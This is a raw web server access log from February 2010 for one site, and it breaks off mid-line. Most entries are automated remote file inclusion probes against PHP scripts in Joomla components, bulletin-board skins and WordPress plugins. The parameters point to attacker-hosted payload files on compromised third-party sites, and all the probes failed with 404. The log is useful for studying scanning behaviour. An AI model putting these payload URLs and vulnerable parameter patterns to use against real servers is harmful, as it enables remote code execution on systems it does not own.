220.73.144.196 - - [20/Feb/2010:09:27:52 -0800] "GET /logs//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:27:52 -0800] "GET /logs/access_100210.log%20%20//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:27:57 -0800] "GET /logs/access_100114.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:27:58 -0800] "GET /logs/access_100203.log%20%20//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:28:11 -0800] "GET /logs/access_100206.log///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:28:39 -0800] "GET /displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:28:39 -0800] "GET /logs/access_100210.log%20%20//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:28:39 -0800] "GET /logs//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:28:57 -0800] "GET /components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:28:57 -0800] "GET /logs//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:29:04 -0800] "GET /logs/access_100207.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:29:37 -0800] "GET /logs/access_100127.log//errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:29:48 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:29:48 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:29:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:29:56 -0800] "GET /logs/access_100119.log//modules/My_eGallery/public/displayCategory.php?basepath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:09:29:58 -0800] "GET /logs/access_100126.log/bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:09:29:58 -0800] "GET /bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:09:29:58 -0800] "GET /logs/bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:09:31:03 -0800] "GET /logs/access_100205.log/bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:31:14 -0800] "GET /logs/access_100203.log%20%20//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:31:38 -0800] "GET /includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:31:38 -0800] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:31:38 -0800] "GET /logs/access_100130.log%20%20//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:31:42 -0800] "GET /logs/access_100203.log%20%20//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:09:32:13 -0800] "GET /bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:09:32:13 -0800] "GET /logs/bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:09:32:13 -0800] "GET /logs/access_100126.log%20%20/bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:32:20 -0800] "GET /logs/access_100127.log%20%20//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:32:29 -0800] "GET /logs/access_100126.log/bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:32:29 -0800] "GET /logs/bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:32:29 -0800] "GET /bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:32:49 -0800] "GET /bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:33:29 -0800] "GET /logs/access_100205.log/bbs/skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:33:39 -0800] "GET /logs/access_100123.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:33:39 -0800] "GET /components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:33:39 -0800] "GET /logs//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:34:12 -0800] "GET /logs/access_100202.log///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:34:24 -0800] "GET /logs/access_100128.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:36:28 -0800] "GET /logs/access_100208.log//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:09:36:33 -0800] "GET /logs/access_100127.log//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:36:52 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:36:52 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:36:52 -0800] "GET /logs/access_100125.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:36:56 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:36:56 -0800] "GET /ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:36:56 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:36:57 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:37:05 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:37:05 -0800] "GET /ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:37:05 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:37:07 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:37:16 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:37:16 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:37:16 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [20/Feb/2010:09:37:31 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [20/Feb/2010:09:37:31 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [20/Feb/2010:09:37:32 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [20/Feb/2010:09:37:32 -0800] "GET /logs/access_100204.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:09:38:04 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:09:38:04 -0800] "GET /logs/access_100205.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:09:38:04 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:09:38:21 -0800] "GET /logs/access_100203.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:38:31 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:38:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:38:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:38:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:38:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:38:48 -0800] "GET /logs/access_100124.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:38:48 -0800] "GET /logs/access_100124.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:38:53 -0800] "GET /logs/access_100208.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:40:00 -0800] "GET /logs/access_100123.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [20/Feb/2010:09:40:17 -0800] "GET /sql.php?classes_dir=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [20/Feb/2010:09:40:17 -0800] "GET /logs/access_100129.log%20%20//sql.php?classes_dir=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [20/Feb/2010:09:40:17 -0800] "GET /logs//sql.php?classes_dir=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [20/Feb/2010:09:40:17 -0800] "GET /logs/access_100116.log%20%20//sql.php?classes_dir=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [20/Feb/2010:09:40:20 -0800] "GET /sql.php?classes_dir=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [20/Feb/2010:09:40:20 -0800] "GET /logs/access_100129.log%20%20//sql.php?classes_dir=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [20/Feb/2010:09:40:20 -0800] "GET /logs//sql.php?classes_dir=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [20/Feb/2010:09:40:20 -0800] "GET /logs/access_100116.log%20%20//sql.php?classes_dir=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [20/Feb/2010:09:41:29 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [20/Feb/2010:09:41:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [20/Feb/2010:09:41:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:41:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:41:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:41:35 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:41:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:41:37 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:09:41:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:44:01 -0800] "GET /logs/access_100115.log/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:44:28 -0800] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:44:28 -0800] "GET /logs/access_100124.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:44:28 -0800] "GET /logs//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:44:34 -0800] "GET /logs/access_100119.log%20%20//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:45:18 -0800] "GET /logs/access_100124.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:45:22 -0800] "GET /logs/access_100119.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:45:50 -0800] "GET /logs/access_100129.log%20%20//main.php?sayfa=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:45:50 -0800] "GET /main.php?sayfa=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:45:50 -0800] "GET /logs//main.php?sayfa=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [20/Feb/2010:09:46:02 -0800] "GET /cam/ HTTP/1.1" 200 749 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:46:28 -0800] "GET /logs/access_100201.log%20%20//main.php?sayfa=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:47:08 -0800] "GET /logs/access_100111.log//com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:47:26 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:47:26 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [20/Feb/2010:09:47:40 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [20/Feb/2010:09:47:40 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [20/Feb/2010:09:47:41 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [20/Feb/2010:09:47:43 -0800] "GET /logs/access_100204.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:09:49:44